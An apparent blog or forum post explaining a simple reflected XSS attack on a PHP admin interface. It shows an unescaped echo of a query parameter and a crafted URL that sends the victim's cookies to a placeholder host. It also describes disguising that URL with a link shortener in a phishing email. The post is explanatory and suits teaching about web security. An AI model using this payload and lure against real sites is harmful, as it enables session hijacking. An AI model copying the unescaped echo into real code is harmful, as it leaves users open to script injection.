Easiest possible XSS attack with a tiny bit of social engineering

Lets suppose you have a simple PHP application, that uses sessions to track users. And it has some kind of admin interface, where users with higher privileges can lets say edit content.

And, lets suppose that you are logged in as an administrator to that site and that there is inside that application a file request.php, with the following piece of code

echo $GET['action'];

And now somebody discovers this, constructs the following url http://yourapp/request.php?action=document.location.href='http://foreignsite?c='+document.cookie

Then that someone adds this url to tinyurl.com, which shortens it to something like http://tinyurl.com/x44534, then he sends you an e-mail, stating "hey, look at this, you my find it useful".

You click the link, tinyurl.com translates the short url back to the long one, redirects your browser to it, your request.php happily outputs the Javascript from the query, your browser sees it, executes it and as a result, the person who runs http://foreignsite gets all your cookies.

Then he just needs to insert those cookie values to his browser, and voila, he has instant access to your site admin interface. Because he got your session cookie.

This described the simplest possible XSS attack, it is really simplistic, will probably not work in the real life, but hopefully you got the basic idea how it works.

mainly CSRF, XSS and Directory traversal:

http://en.wikipedia.org/wiki/Cross-site_request_forgery

http://en.wikipedia.org/wiki/Cross-site_scripting

http://en.wikipedia.org/wiki/Directory_traversal